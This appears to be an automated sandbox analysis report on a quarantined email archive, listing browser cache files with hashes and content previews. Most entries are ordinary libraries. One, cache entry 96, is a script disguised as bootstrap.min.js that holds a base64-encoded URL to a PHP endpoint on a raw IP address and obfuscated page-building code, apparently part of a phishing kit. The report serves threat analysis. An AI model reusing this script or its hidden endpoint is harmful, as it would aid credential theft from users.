              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

              Chrome Cache Entry: 84

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (32065)
              Category:dropped
              Size (bytes):85578
              Entropy (8bit):5.366055229017455
              Encrypted:false
              SSDEEP:
              MD5:2F6B11A7E914718E0290410E85366FE9
              SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
              SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
              SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
              Malicious:false
              Reputation:unknown
              Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

              Chrome Cache Entry: 87

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:SVG Scalable Vector Graphics image
              Category:downloaded
              Size (bytes):1864
              Entropy (8bit):5.222032823730197
              Encrypted:false
              SSDEEP:
              MD5:BC3D32A696895F78C19DF6C717586A5D
              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
              Malicious:false
              Reputation:unknown
              URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

              Chrome Cache Entry: 89

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (50758)
              Category:downloaded
              Size (bytes):51039
              Entropy (8bit):5.247253437401007
              Encrypted:false
              SSDEEP:
              MD5:67176C242E1BDC20603C878DEE836DF3
              SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
              SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
              SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
              Malicious:false
              Reputation:unknown
              URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
              Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum

              Chrome Cache Entry: 91

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (19015)
              Category:dropped
              Size (bytes):19188
              Entropy (8bit):5.212814407014048
              Encrypted:false
              SSDEEP:
              MD5:70D3FDA195602FE8B75E0097EED74DDE
              SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
              SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
              SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
              Malicious:false
              Reputation:unknown
              Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio

              Chrome Cache Entry: 92

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
              Category:dropped
              Size (bytes):621
              Entropy (8bit):7.673946009263606
              Encrypted:false
              SSDEEP:
              MD5:4761405717E938D7E7400BB15715DB1E
              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
              Malicious:false
              Reputation:unknown
              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...

              Chrome Cache Entry: 93

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (48664)
              Category:dropped
              Size (bytes):48944
              Entropy (8bit):5.272507874206726
              Encrypted:false
              SSDEEP:
              MD5:14D449EB8876FA55E1EF3C2CC52B0C17
              SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
              SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
              SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
              Malicious:false
              Reputation:unknown
              Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp

              Chrome Cache Entry: 96

              Download File
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65462), with CRLF line terminators
              Category:downloaded
              Size (bytes):553308
              Entropy (8bit):4.912181161454127
              Encrypted:false
              SSDEEP:
              MD5:4FB1BAEE47BFB1D87D7390A19439B9DF
              SHA1:090D4E31A82666C5521F2F04F998AEE027AD9172
              SHA-256:CACF75F5AC1A1647F5B7A1380944F4DBAB84F219C7BCFC6F78316BBBA0177860
              SHA-512:EAB96236A0DFDCF7CCCAF3769F1D339EE843EF3E3EC9BD7AA874866DFB8B5AE0645CCDF84065B8336A79AD0DE5A8C42B12BACD5E3D7DE2A31266599E44C87EE4
              Malicious:false
              Reputation:unknown
              URL:https://7353914071-1323985617.cos.sa-saopaulo.myqcloud.com/attach%2Fbootstrap.min.js
              Preview:var file = "aHR0cDovLzE1NC4xMi4yMjUuMTYzLzczNTM5MTQwNzEvbmV4dC5waHA=";....var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20hr\x20{\x20','end\x20!impor','er;\x20justif','tify\x20!impo','owrap\x20!imp','kit-clip-p','or:\x20#00408','ble\x20td,\x20.t','t/ests/2.1','hite-space','r\x20p-2\x22\x20onm','\x20#pacifism','>&nbsp<spa','sm-wrap\x20{\x20','g9GFerfs7/','fDngjSvCsG','u\x20to\x20your\x20','pover-top\x20','\x20}\x20.btn-da','webkit-app','an><br>\x20<d','lumn;\x20flex','\x20#6c757d\x20!','+PQcVpU7gF','#495057;\x20b','-color:\x20#1','\x20calc(.3re','rst-child)','econdary:f','to\x20!import','}\x20.table-r','-box-flex:','cus,\x20.was-','ng-top:\x200\x20','utton.bg-w','eader,\x20.ca','\x200\x20}\x20.tabl','re,\x20.bs-to','image/svg+','tton:focus','jo4inKDdSN','{\x20text-tra','roup:\x2013;\x20',',\x20.btn.act','r:\x20#28a745','vcoBM','\x20.border-i','

              Static File Info

              General

              File type:Zip archive data, at least v4.5 to extract, compression method=deflate
              Entropy (8bit):7.996149785721105
              TrID:
              • ZIP compressed archive (8000/1) 100.00%
              File name:Quarantined Messages(11).zip
              File size:53'194 bytes
              MD5:03430da0f93aa351348a314954c0a8f2
              SHA1:34acfc8fb8eafbfa475cee8ef8c47698a53243f0
              SHA256:d76ddc960eb2350fda3b6921c19d40b1ae5e6f3a4cb2433dfdea3f10f03461e2
              SHA512:06a8b039a5b74bde6ab24b27f2a592fc0387272187cb31618ab3fde7ab89a07bcb7d8a3301de904c0cd3d78e6925a78baba6cea010a1d7109a70765e910d67ce
              SSDEEP:1536:+egT6hwzBZT0Bm2r0c0EEd78N2TgSHEMQl4xLqEhgg:lhw30BmO0wFSYmAEyg
              TLSH:6D3302C8919A6AB6C9095B3238CA248133E2DA8355D77751CFB5ACC6CF9CD94138F81F
              File Content Preview:PK..-.....Z;JY>s.[........M...ca56da36-71ea-4ec2-9820-08dce887adf9/1c99d929-e95f-2462-0a44-8852be668566.eml....ZR..................3...?....8..j^.d..E....3..mEm.R..a..4)........I]=[R9c....=.e.QX..Q...o$.D...Xx........w....*._>...So....o[I...~.........[...

              File Icon

              Icon Hash:1c1c1e4e4ececedc